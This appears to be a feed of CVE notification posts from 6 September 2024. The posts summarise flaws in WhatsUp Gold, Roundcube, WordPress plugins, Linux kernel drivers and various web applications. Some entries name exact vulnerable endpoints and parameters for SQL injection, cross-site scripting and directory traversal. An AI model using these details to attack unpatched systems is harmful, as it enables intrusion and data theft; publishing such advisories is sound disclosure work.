🚨 CVE-2024-4030On Windows a directory returned by tempfile.mkdtemp() would not always have permissions set to restrict reading and writing to the temporary directory by other users, instead usually inheriting the correct permissions from the default location. Alternate configurations or users without a profile directory may not have the intended permissions.If you’re not using Windows or haven’t changed the temporary directory location then you aren’t affected by this vulnerability. On other platforms the returned directory is consistently readable and writable only by the current user.This issue was caused by Python not supporting Unix permissions on Windows. The fix adds support for Unix “700” for the mkdir function on Windows which is used by mkdtemp() to ensure the newly created directory has the proper permissions.🎖@cveNotify |
|
| 2024-09-06 23:37:26 |
🚨 CVE-2024-44796A cross-site scripting (XSS) vulnerability in the component /auth/AzureRedirect.php of PicUploader commit fcf82ea allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the error_description parameter.🎖@cveNotify |
|
| 2024-09-06 23:37:25 |
🚨 CVE-2024-33903In CARLA through 0.9.15.2, the collision sensor mishandles some situations involving pedestrians or bicycles, in part because the collision sensor function is not exposed to the Blueprint library.🎖@cveNotify |
|
| 2024-09-06 23:37:24 |
🚨 CVE-2024-30939An issue discovered in Yealink VP59 Teams Editions with firmware version 91.15.0.118 allows a physically proximate attacker to gain control of an account via a flaw in the factory reset procedure.🎖@cveNotify |
|
| 2024-09-06 23:07:32 |
🚨 CVE-2024-5010In WhatsUp Gold versions released before 2023.1.3, a vulnerability exists in the TestController functionality. A specially crafted unauthenticatedHTTP request can lead to a disclosure of sensitive information.🎖@cveNotify |
|
| 2024-09-06 23:07:26 |
🚨 CVE-2024-5009In WhatsUp Gold versions released before 2023.1.3, an Improper Access Control vulnerability in Wug.UI.Controllers.InstallController.SetAdminPassword allows local attackers to modify admin's password.🎖@cveNotify |
|
| 2024-09-06 23:07:25 |
🚨 CVE-2024-4884In WhatsUp Gold versions released before 2023.1.3, an unauthenticated Remote Code Execution vulnerability in Progress WhatsUpGold. The Apm.UI.Areas.APM.Controllers.CommunityController allows execution of commands with iisapppool\nmconsole privileges.🎖@cveNotify |
|
| 2024-09-06 23:07:24 |
🚨 CVE-2024-4883In WhatsUp Gold versions released before 2023.1.3, a Remote Code Execution issue exists in Progress WhatsUp Gold. This vulnerability allows an unauthenticated attacker to achieve the RCE as a service account through NmApi.exe.🎖@cveNotify |
|
| 2024-09-06 22:07:32 |
🚨 CVE-2024-42009A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7 allows a remote attacker to steal and send emails of a victim via a crafted e-mail message that abuses a Desanitization issue in message_body() in program/actions/mail/show.php.🎖@cveNotify |
|
| 2024-09-06 22:07:26 |
🚨 CVE-2024-42008A Cross-Site Scripting vulnerability in rcmail_action_mail_get->run() in Roundcube through 1.5.7 and 1.6.x through 1.6.7 allows a remote attacker to steal and send emails of a victim via a malicious e-mail attachment served with a dangerous Content-Type header.🎖@cveNotify |
|
| 2024-09-06 22:07:25 |
🚨 CVE-2024-38430Matrix - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')🎖@cveNotify |
|
| 2024-09-06 22:07:24 |
🚨 CVE-2024-38429Matrix Tafnit v8 - CWE-552: Files or Directories Accessible to External Parties🎖@cveNotify |
|
| 2024-09-06 21:37:30 |
🚨 CVE-2024-31025SQL Injection vulnerability in ECshop 4.x allows an attacker to obtain sensitive information via the file/article.php component.🎖@cveNotify |
|
| 2024-09-06 21:37:26 |
🚨 CVE-2023-21324In Package Installer, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-09-06 21:37:25 |
🚨 CVE-2021-39810In NFC, there is a possible way to setup a default contactless payment app without user consent due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-09-06 21:37:24 |
🚨 CVE-2022-4573An SMI handler input validation vulnerability in the ThinkPad X1 Fold Gen 1 could allow an attacker with local access and elevated privileges to execute arbitrary code.🎖@cveNotify |
|
| 2024-09-06 21:07:26 |
🚨 CVE-2024-23499Protection mechanism failure in Linux kernel mode driver for some Intel(R) Ethernet Network Controllers and Adapters E810 Series before version 28.3 may allow an unauthenticated user to potentially enable denial of service via network access.🎖@cveNotify |
|
| 2024-09-06 21:07:25 |
🚨 CVE-2024-37900XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. When uploading an attachment with a malicious filename, malicious JavaScript code could be executed. This requires a social engineering attack to get the victim into uploading a file with a malicious name. The malicious code is solely executed during the upload and affects only the user uploading the attachment. While this allows performing actions in the name of that user, it seems unlikely that a user wouldn't notice the malicious filename while uploading the attachment. This has been patched in XWiki 14.10.21, 15.5.5, 15.10.6 and 16.0.0.🎖@cveNotify |
|
| 2024-09-06 20:37:33 |
🚨 CVE-2023-21374In System UI, there is a possible factory reset protection bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-09-06 20:37:26 |
🚨 CVE-2023-21342In Speech, there is a possible way to bypass background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-09-06 20:37:25 |
🚨 CVE-2017-1000253Linux distributions that have not patched their long-term kernels with https://git.kernel.org/linus/a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (committed on April 14, 2015). This kernel vulnerability was fixed in April 2015 by commit a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (backported to Linux 3.10.77 in May 2015), but it was not recognized as a security threat. With CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE enabled, and a normal top-down address allocation strategy, load_elf_binary() will attempt to map a PIE binary into an address range immediately below mm->mmap_base. Unfortunately, load_elf_ binary() does not take account of the need to allocate sufficient space for the entire binary which means that, while the first PT_LOAD segment is mapped below mm->mmap_base, the subsequent PT_LOAD segment(s) end up being mapped above mm->mmap_base into the are that is supposed to be the "gap" between the stack and the binary.🎖@cveNotify |
|
| 2024-09-06 19:37:32 |
🚨 CVE-2023-5766A remote code execution vulnerability in Remote Desktop Manager 2023.2.33 and earlier on Windows allows an attacker to remotely execute code from another windows user session on the same host via a specially crafted TCP packet.🎖@cveNotify |
|
| 2024-09-06 19:37:26 |
🚨 CVE-2023-46930GPAC 2.3-DEV-rev605-gfc9e29089-master contains a SEGV in gpac/MP4Box in gf_isom_find_od_id_for_track /afltest/gpac/src/isomedia/media_odf.c:522:14.🎖@cveNotify |
|
| 2024-09-06 19:37:25 |
🚨 CVE-2023-21397In Setup Wizard, there is a possible way to save a WiFi network due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-09-06 19:37:24 |
🚨 CVE-2023-21396In Activity Manager, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-09-06 19:07:26 |
🚨 CVE-2024-28050Improper access control in some Intel(R) Arc(TM) & Iris(R) Xe Graphics software before version 31.0.101.4824 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2024-09-06 19:07:25 |
🚨 CVE-2024-26027Uncontrolled search path for some Intel(R) Simics Package Manager software before version 1.8.3 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-09-06 19:07:24 |
🚨 CVE-2024-26025Incorrect default permissions for some Intel(R) Advisor software before version 2024.1 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-09-06 18:37:40 |
🚨 CVE-2024-28064Kiteworks Totemomail 7.x and 8.x before 8.3.0 allows /responsiveUI/EnvelopeOpenServlet messageId directory traversal for unauthenticated file read and delete operations (with displayLoginChunkedImages) and write operations (with storeLoginChunkedImages).🎖@cveNotify |
|
| 2024-09-06 18:37:36 |
🚨 CVE-2023-40548A buffer overflow was found in Shim in the 32-bit system. The overflow happens due to an addition operation involving a user-controlled value parsed from the PE binary being used by Shim. This value is further used for memory allocation operations, leading to a heap-based buffer overflow. This flaw causes memory corruption and can lead to a crash or data integrity issues during the boot phase.🎖@cveNotify |
|
| 2024-09-06 18:37:35 |
🚨 CVE-2023-47473Directory Traversal vulnerability in fuwushe.org iFair versions 23.8_ad0 and before allows an attacker to obtain sensitive information via a crafted script.🎖@cveNotify |
|
| 2024-09-06 18:37:31 |
🚨 CVE-2023-45893An indirect Object Reference (IDOR) in the Order and Invoice pages in Floorsight Customer Portal Q3 2023 allows an unauthenticated remote attacker to view sensitive customer information.🎖@cveNotify |
|
| 2024-09-06 18:37:30 |
🚨 CVE-2023-33927Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themeisle Multiple Page Generator Plugin – MPG multiple-pages-generator-by-porthas allows SQL Injection.This issue affects Multiple Page Generator Plugin – MPG: from n/a through 3.3.19.🎖@cveNotify |
|
| 2024-09-06 18:37:26 |
🚨 CVE-2023-28777Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LearnDash LearnDash LMS allows SQL Injection.This issue affects LearnDash LMS: from n/a through 4.5.3.🎖@cveNotify |
|
| 2024-09-06 18:37:25 |
🚨 CVE-2023-36263Prestashop opartlimitquantity 1.4.5 and before is vulnerable to SQL Injection. OpartlimitquantityAlertlimitModuleFrontController::displayAjaxPushAlertMessage()` has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.🎖@cveNotify |
|
| 2024-09-06 18:07:24 |
🚨 CVE-2024-7697Logical vulnerability in the mobile application (com.transsion.carlcare) may lead to user information leakage risks.🎖@cveNotify |
|
| 2024-09-06 17:07:41 |
🚨 CVE-2024-8415A vulnerability was found in SourceCodester Food Ordering Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /routers/add-ticket.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-06 17:07:37 |
🚨 CVE-2024-45076IBM webMethods Integration 10.15 could allow an authenticated user to upload and execute arbitrary files which could be executed on the underlying operating system.🎖@cveNotify |
|
| 2024-09-06 17:07:36 |
🚨 CVE-2024-45074IBM webMethods Integration 10.15 could allow an authenticated user to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.🎖@cveNotify |
|
| 2024-09-06 17:07:35 |
🚨 CVE-2024-41572Learning with Texts (LWT) 2.0.3 is vulnerable to Cross Site Scripting (XSS). The application has a specific function that does not filter special characters in URL parameters. Remote attackers can inject JavaScript code without authorization. Exploiting this vulnerability, attackers can steal user credentials or execute actions such as injecting malicious scripts or redirecting users to malicious sites.🎖@cveNotify |
|
| 2024-09-06 17:07:32 |
🚨 CVE-2024-43240Improper Privilege Management vulnerability in azzaroco Ultimate Membership Pro allows Privilege Escalation.This issue affects Ultimate Membership Pro: from n/a through 12.6.🎖@cveNotify |
|
| 2024-09-06 17:07:31 |
🚨 CVE-2023-7265Permission verification vulnerability in the lock screen moduleImpact: Successful exploitation of this vulnerability may affect availability🎖@cveNotify |
|
| 2024-09-06 17:07:30 |
🚨 CVE-2024-6280A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/ajax.php?action=save_settings. The manipulation of the argument img leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269493 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-09-06 17:07:27 |
🚨 CVE-2024-6273A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been declared as problematic. Affected by this vulnerability is the function save_patient of the file patient_side.php. The manipulation of the argument Full Name/Contact/Address leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269485 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-09-06 17:07:26 |
🚨 CVE-2024-6253A vulnerability was found in itsourcecode Online Food Ordering System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /purchase.php. The manipulation of the argument customer leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269420.🎖@cveNotify |
|
| 2024-09-06 17:07:25 |
🚨 CVE-2024-6191A vulnerability classified as critical has been found in itsourcecode Student Management System 1.0. This affects an unknown part of the file login.php of the component Login Page. The manipulation of the argument user leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269163.🎖@cveNotify |
|
| 2024-09-06 16:37:39 |
🚨 CVE-2024-44964In the Linux kernel, the following vulnerability has been resolved:idpf: fix memory leaks and crashes while performing a soft resetThe second tagged commit introduced a UAF, as it removed restoringq_vector->vport pointers after reinitializating the structures.This is due to that all queue allocation functions are performed herewith the new temporary vport structure and those functions rewritethe backpointers to the vport. Then, this new struct is freed andthe pointers start leading to nowhere.But generally speaking, the current logic is very fragile. It claimsto be more reliable when the system is low on memory, but in fact, itconsumes two times more memory as at the moment of running thisfunction, there are two vports allocated with their queues and vectors.Moreover, it claims to prevent the driver from running into "bad state",but in fact, any error during the rebuild leaves the old vport in thepartially allocated state.Finally, if the interface is down when the function is called, it alwaysallocates a new queue set, but when the user decides to enable theinterface later on, vport_open() allocates them once again, IOW there'sa clear memory leak here.Just don't allocate a new queue set when performing a reset, that solvescrashes and memory leaks. Readd the old queue number and reopen theinterface on rollback - that solves limbo states when the device is leftdisabled and/or without HW queues enabled.🎖@cveNotify |
|
| 2024-09-06 16:37:32 |
🚨 CVE-2024-44957In the Linux kernel, the following vulnerability has been resolved:xen: privcmd: Switch from mutex to spinlock for irqfdsirqfd_wakeup() gets EPOLLHUP, when it is called byeventfd_release() by way of wake_up_poll(&ctx->wqh, EPOLLHUP), whichgets called under spin_lock_irqsave(). We can't use a mutex here as itwill lead to a deadlock.Fix it by switching over to a spin lock.🎖@cveNotify |
|
| 2024-09-06 16:07:26 |
🚨 CVE-2024-34656Path traversal in Samsung Notes prior to version 4.4.21.62 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2024-09-06 16:07:25 |
🚨 CVE-2024-43250Incorrect Authorization vulnerability in Bit Apps Bit Form Pro bitformpro allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Bit Form Pro: from n/a through 2.6.4.🎖@cveNotify |
|
| 2024-09-06 15:37:27 |
🚨 CVE-2023-51785Deserialization of Untrusted Data vulnerability in Apache InLong.This issue affects Apache InLong: from 1.7.0 through 1.9.0, the attackers can make a arbitrary file read attack using mysql driver. Users are advised to upgrade to Apache InLong's 1.10.0 or cherry-pick [1] to solve it.[1] https://github.com/apache/inlong/pull/9331🎖@cveNotify |
|
| 2024-09-06 15:37:26 |
🚨 CVE-2020-24918A buffer overflow in the RTSP service of the Ambarella Oryx RTSP Server 2020-01-07 allows an unauthenticated attacker to send a crafted RTSP request, with a long digest authentication header, to execute arbitrary code in parse_authentication_header() in libamprotocol-rtsp.so.1 in rtsp_svc (or cause a crash). This allows remote takeover of a Furbo Dog Camera, for example. NOTE: The vendor states that the RTSP library is used for DEMO only, using it in product is a customer's behavior. Ambarella has emphasized that RTSP is DEMO only library, should NOT be used in product in our document. Because Ambarella's SDK is proprietary, we didn't publish our SDK source code in public network.🎖@cveNotify |
|
| 2024-09-06 15:37:25 |
🚨 CVE-2020-24198A persistent cross-site scripting vulnerability in Sourcecodester Stock Management System v1.0 allows remote attackers to inject arbitrary web script or HTML via the 'Brand Name.'🎖@cveNotify |
|
| 2024-09-06 15:07:32 |
🚨 CVE-2024-45449Access permission verification vulnerability in the ringtone setting moduleImpact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-09-06 15:07:28 |
🚨 CVE-2022-48886In the Linux kernel, the following vulnerability has been resolved:ice: Add check for kzallocAdd the check for the return value of kzalloc in order to avoidNULL pointer dereference.Moreover, use the goto-label to share the clean code.🎖@cveNotify |
|
| 2024-09-06 15:07:27 |
🚨 CVE-2022-48873In the Linux kernel, the following vulnerability has been resolved:misc: fastrpc: Don't remove map on creater_process and device_releaseDo not remove the map from the list on error path infastrpc_init_create_process, instead call fastrpc_map_put, to avoiduse-after-free. Do not remove it on fastrpc_device_release either,call fastrpc_map_put instead.The fastrpc_free_map is the only proper place to remove the map.This is called only after the reference count is 0.🎖@cveNotify |
|
| 2024-09-06 15:07:26 |
🚨 CVE-2024-38321IBM Business Automation Workflow 22.0.2, 23.0.1, 23.0.2, and 24.0.0 stores potentially sensitive information in log files under certain situations that could be read by an authenticated user. IBM X-Force ID: 284868.🎖@cveNotify |
|
| 2024-09-06 14:37:31 |
🚨 CVE-2023-46817An issue was discovered in phpFox before 4.8.14. The url request parameter passed to the /core/redirect route is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code.🎖@cveNotify |
|
| 2024-09-06 14:37:30 |
🚨 CVE-2023-45024Best Practical Request Tracker (RT) 5 before 5.0.5 allows Information Disclosure via a transaction search in the transaction query builder.🎖@cveNotify |
|
| 2024-09-06 14:37:26 |
🚨 CVE-2023-31102Ppmd7.c in 7-Zip before 23.00 allows an integer underflow and invalid read operation via a crafted 7Z archive.🎖@cveNotify |
|
| 2024-09-06 14:37:25 |
🚨 CVE-2023-47204Unsafe YAML deserialization in yaml.Loader in transmute-core before 1.13.5 allows attackers to execute arbitrary Python code.🎖@cveNotify |
|
| 2024-09-06 14:07:55 |
🚨 CVE-2024-42252In the Linux kernel, the following vulnerability has been resolved:closures: Change BUG_ON() to WARN_ON()If a BUG_ON() can be hit in the wild, it shouldn't be a BUG_ON()For reference, this has popped up once in the CI, and we'll need moreinfo to debug it:03240 ------------[ cut here ]------------03240 kernel BUG at lib/closure.c:21!03240 kernel BUG at lib/closure.c:21!03240 Internal error: Oops - BUG: 00000000f2000800 [#1] SMP03240 Modules linked in:03240 CPU: 15 PID: 40534 Comm: kworker/u80:1 Not tainted 6.10.0-rc4-ktest-ga56da69799bd #2557003240 Hardware name: linux,dummy-virt (DT)03240 Workqueue: btree_update btree_interior_update_work03240 pstate: 00001005 (nzcv daif -PAN -UAO -TCO -DIT +SSBS BTYPE=--)03240 pc : closure_put+0x224/0x2a003240 lr : closure_put+0x24/0x2a003240 sp : ffff0000d12071c003240 x29: ffff0000d12071c0 x28: dfff800000000000 x27: ffff0000d120736003240 x26: 0000000000000040 x25: 0000000000000040 x24: 000000000000004003240 x23: ffff0000c1f20180 x22: 0000000000000000 x21: ffff0000c1f2016803240 x20: 0000000040000000 x19: ffff0000c1f20140 x18: 000000000000000103240 x17: 0000000000003aa0 x16: 0000000000003ad0 x15: 1fffe0001c32697403240 x14: 0000000000000a1e x13: 0000000000000000 x12: 1fffe000183e402d03240 x11: ffff6000183e402d x10: dfff800000000000 x9 : ffff6000183e402e03240 x8 : 0000000000000001 x7 : 00009fffe7c1bfd3 x6 : ffff0000c1f2016b03240 x5 : ffff0000c1f20168 x4 : ffff6000183e402e x3 : ffff80008139195403240 x2 : 0000000000000001 x1 : 0000000000000000 x0 : 00000000a800000003240 Call trace:03240 closure_put+0x224/0x2a003240 bch2_check_for_deadlock+0x910/0x102803240 bch2_six_check_for_deadlock+0x1c/0x3003240 six_lock_slowpath.isra.0+0x29c/0xed003240 six_lock_ip_waiter+0xa8/0xf803240 __bch2_btree_node_lock_write+0x14c/0x29803240 bch2_trans_lock_write+0x6d4/0xb1003240 __bch2_trans_commit+0x135c/0x552003240 btree_interior_update_work+0x1248/0x1c1003240 process_scheduled_works+0x53c/0xd9003240 worker_thread+0x370/0x8c803240 kthread+0x258/0x2e803240 ret_from_fork+0x10/0x2003240 Code: aa1303e0 d63f0020 a94363f7 17ffff8c (d4210000)03240 ---[ end trace 0000000000000000 ]---03240 Kernel panic - not syncing: Oops - BUG: Fatal exception03240 SMP: stopping secondary CPUs03241 SMP: failed to stop secondary CPUs 13,1503241 Kernel Offset: disabled03241 CPU features: 0x00,00000003,80000008,4240500b03241 Memory Limit: none03241 ---[ end Kernel panic - not syncing: Oops - BUG: Fatal exception ]---03246 ========= FAILED TIMEOUT copygc_torture_no_checksum in 7200s🎖@cveNotify |
|
| 2024-09-06 13:37:34 |
🚨 CVE-2024-7211The 1E Platform's component utilized the third-party Duende Identity Server, which suffered from an open redirect vulnerability, permitting an attacker to control the redirection path of end users.Note: 1E Platform's component utilizing the third-party Duende Identity Server has been updated with the patch that includes the fix.🎖@cveNotify |
|
| 2024-09-06 13:37:33 |
🚨 CVE-2024-25744In the Linux kernel before 6.6.7, an untrusted VMM can trigger int80 syscall handling at any given point. This is related to arch/x86/coco/tdx/tdx.c and arch/x86/mm/mem_encrypt_amd.c.🎖@cveNotify |
|
| 2024-09-06 13:07:44 |
🚨 CVE-2024-24759MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 23.12.4.2, a threat actor can bypass the server-side request forgery protection on the whole website with DNS Rebinding. The vulnerability can also lead to denial of service. Version 23.12.4.2 contains a patch.🎖@cveNotify |
|
| 2024-09-06 13:07:43 |
🚨 CVE-2024-45097IBM Aspera Faspex 5.0.0 through 5.0.9 could allow a user to bypass intended access restrictions and conduct resource modification.🎖@cveNotify |
|
| 2024-09-06 13:07:42 |
🚨 CVE-2024-25741printer_write in drivers/usb/gadget/function/f_printer.c in the Linux kernel through 6.7.4 does not properly call usb_ep_queue, which might allow attackers to cause a denial of service or have unspecified other impact.🎖@cveNotify |
|
| 2024-09-06 12:37:36 |
🚨 CVE-2024-45400ckeditor-plugin-openlink is a plugin for the CKEditor JavaScript text editor that extends the context menu with a possibility to open a link in a new tab. A vulnerability in versions of the plugin prior to 1.0.7 allowed a user to execute JavaScript code by abusing the link href attribute. The fix is available starting with version 1.0.7.🎖@cveNotify |
|
| 2024-09-06 12:37:32 |
🚨 CVE-2024-39278Credentials to access device configuration information stored unencrypted in flash memory. These credentials would allow read-only access to network configuration information and terminal configuration data.🎖@cveNotify |
|
| 2024-09-06 12:37:31 |
🚨 CVE-2024-45158An issue was discovered in Mbed TLS 3.6 before 3.6.1. A stack buffer overflow in mbedtls_ecdsa_der_to_raw() and mbedtls_ecdsa_raw_to_der() can occur when the bits parameter is larger than the largest supported curve. In some configurations with PSA disabled, all values of bits are affected. (This never happens in internal library calls, but can affect applications that call these functions directly.)🎖@cveNotify |
|
| 2024-09-06 12:37:27 |
🚨 CVE-2024-7591Improper Input Validation vulnerability in Progress LoadMaster allows OS Command Injection.This issue affects:* LoadMaster: 7.2.40.0 and above* ECS: All versions* Multi-Tenancy: 7.1.35.4 and above🎖@cveNotify |
|
| 2024-09-06 12:37:26 |
🚨 CVE-2024-42491Asterisk is an open-source private branch exchange (PBX). Prior to versions 18.24.3, 20.9.3, and 21.4.3 of Asterisk and versions 18.9-cert12 and 20.7-cert2 of certified-asterisk, if Asterisk attempts to send a SIP request to a URI whose host portion starts with `.1` or `[.1]`, and res_resolver_unbound is loaded, Asterisk will crash with a SEGV. To receive a patch, users should upgrade to one of the following versions: 18.24.3, 20.9.3, 21.4.3, certified-18.9-cert12, certified-20.7-cert2. Two workarounds are available. Disable res_resolver_unbound by setting `noload = res_resolver_unbound.so` in modules.conf, or set `rewrite_contact = yes` on all PJSIP endpoints. NOTE: This may not be appropriate for all Asterisk configurations.🎖@cveNotify |
|
| 2024-09-06 12:37:25 |
🚨 CVE-2024-45096IBM Aspera Faspex 5.0.0 through 5.0.9 could allow a user with access to the package to obtain sensitive information through a directory listing.🎖@cveNotify |
|
| 2024-09-06 12:07:37 |
🚨 CVE-2024-8472Cross-Site Scripting (XSS) vulnerability, whereby user-controlled input is not sufficiently encrypted. Exploitation of this vulnerability could allow an attacker to retrieve the session details of an authenticated user through multiple parameters in /jobportal/index.php.🎖@cveNotify |
|
| 2024-09-06 12:07:32 |
🚨 CVE-2024-8470SQL injection vulnerability, by which an attacker could send a specially designed query through CATEGORY parameter in /jobportal/admin/vacancy/controller.php, and retrieve all the information stored in it.🎖@cveNotify |
|
| 2024-09-06 12:07:31 |
🚨 CVE-2024-8467SQL injection vulnerability, by which an attacker could send a specially designed query through id parameter in /jobportal/admin/category/index.php, and retrieve all the information stored in it.🎖@cveNotify |
|
| 2024-09-06 11:37:25 |
🚨 CVE-2024-8465SQL injection vulnerability, by which an attacker could send a specially designed query through user_id parameter in /jobportal/admin/user/controller.php, and retrieve all the information stored in it.🎖@cveNotify |
|
| 2024-09-06 11:37:24 |
🚨 CVE-2024-8464SQL injection vulnerability, by which an attacker could send a specially designed query through JOBREGID parameter in /jobportal/admin/applicants/controller.php, and retrieve all the information stored in it.🎖@cveNotify |
|
| 2024-09-06 11:07:24 |
🚨 CVE-2024-7381The Geo Controller plugin for WordPress is vulnerable to unauthorized shortcode execution due to missing authorization and capability checks on the ajax__shortcode_cache function in all versions up to, and including, 8.6.9. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes available on the target site.🎖@cveNotify |
|
| 2024-09-06 10:37:24 |
🚨 CVE-2024-7380The Geo Controller plugin for WordPress is vulnerable to unauthorized menu creation/deletion due to missing capability checks on the ajax__geolocate_menu and ajax__geolocate_remove_menu functions in all versions up to, and including, 8.6.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create or delete WordPress menus.🎖@cveNotify |
|
| 2024-09-06 09:37:25 |
🚨 CVE-2023-52916In the Linux kernel, the following vulnerability has been resolved:media: aspeed: Fix memory overwrite if timing is 1600x900When capturing 1600x900, system could crash when system memory usage istight.The way to reproduce this issue:1. Use 1600x900 to display on host2. Mount ISO through 'Virtual media' on OpenBMC's web3. Run script as below on host to do sha continuously #!/bin/bash while [ [1] ]; do find /media -type f -printf '"%h/%f"\n' | xargs sha256sum done4. Open KVM on OpenBMC's webThe size of macro block captured is 8x8. Therefore, we should make surethe height of src-buf is 8 aligned to fix this issue.🎖@cveNotify |
|
| 2024-09-06 09:37:24 |
🚨 CVE-2023-52915In the Linux kernel, the following vulnerability has been resolved:media: dvb-usb-v2: af9035: Fix null-ptr-deref in af9035_i2c_master_xferIn af9035_i2c_master_xfer, msg is controlled by user. When msg[i].bufis null and msg[i].len is zero, former checks on msg[i].buf would bepassed. Malicious data finally reach af9035_i2c_master_xfer. If accessingmsg[i].buf[0] without sanity check, null ptr deref would happen.We add check on msg[i].len to prevent crash.Similar commit:commit 0ed554fd769a("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()")🎖@cveNotify |
|
| 2024-09-06 08:37:24 |
🚨 CVE-2024-0323The FTP server used on the B&RAutomation Runtime supports unsecure encryption mechanisms, such as SSLv3,TLSv1.0 and TLS1.1. An network-based attacker can exploit the flaws to conductman-in-the-middle attacks or to decrypt communications between the affected productclients.🎖@cveNotify |
|
| 2024-09-06 07:37:25 |
🚨 CVE-2024-8292The WP-Recall – Registration, Profile, Commerce & More plugin for WordPress is vulnerable to privilege escalation/account takeover in all versions up to, and including, 16.26.8. This is due to to plugin not properly verifying a user's identity during new order creation. This makes it possible for unauthenticated attackers to supply any email through the user_email field and update the password for that user during new order creation. This requires the commerce addon to be enabled in order to exploit.🎖@cveNotify |
|
| 2024-09-06 07:37:24 |
🚨 CVE-2024-7349The LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes plugin for WordPress is vulnerable to blind SQL Injection via the 'order' parameter in all versions up to, and including, 7.7.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-09-06 06:37:26 |
🚨 CVE-2024-6792The WP ULike WordPress plugin before 4.7.2.1 does not properly sanitize user display names when rendering on a public page.🎖@cveNotify |
|
| 2024-09-06 05:37:32 |
🚨 CVE-2024-45751tgt (aka Linux target framework) before 1.0.93 attempts to achieve entropy by calling rand without srand. The PRNG seed is always 1, and thus the sequence of challenges is always identical.🎖@cveNotify |
|
| 2024-09-06 05:37:26 |
🚨 CVE-2024-39585Dell SmartFabric OS10 Software, version(s) 10.5.5.4 through 10.5.5.10 and 10.5.6.x, contain(s) an Use of Hard-coded Password vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Client-side request forgery and Information disclosure.🎖@cveNotify |
|
| 2024-09-06 05:37:25 |
🚨 CVE-2024-28215nGrinder before 3.5.9 allows an attacker to create or update webhook configuration due to lack of access control, which could be the cause of information disclosure and limited Server-Side Request Forgery.🎖@cveNotify |
|
| 2024-09-06 05:37:24 |
🚨 CVE-2024-28214nGrinder before 3.5.9 allows to set delay without limitation, which could be the cause of Denial of Service by remote attacker.🎖@cveNotify |
|
| 2024-09-06 04:37:28 |
🚨 CVE-2024-8480The Image Optimizer, Resizer and CDN – Sirv plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'sirv_save_prevented_sizes' function in all versions up to, and including, 7.2.7. This makes it possible for authenticated attackers, with Contributor-level access and above, to exploit the 'sirv_upload_file_by_chunks_callback' function, which lacks proper file type validation, allowing attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-09-06 04:37:27 |
🚨 CVE-2024-7415The Remember Me Controls plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.0.1. This is due to the plugin allowing direct access to the bootstrap.php file which has display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.🎖@cveNotify |
|
| 2024-09-06 03:37:24 |
🚨 CVE-2023-25632The Android Mobile Whale browser app before 3.0.1.2 allows the attacker to bypass its browser unlock function via 'Open in Whale' feature.🎖@cveNotify |
|
| 2024-09-06 02:37:24 |
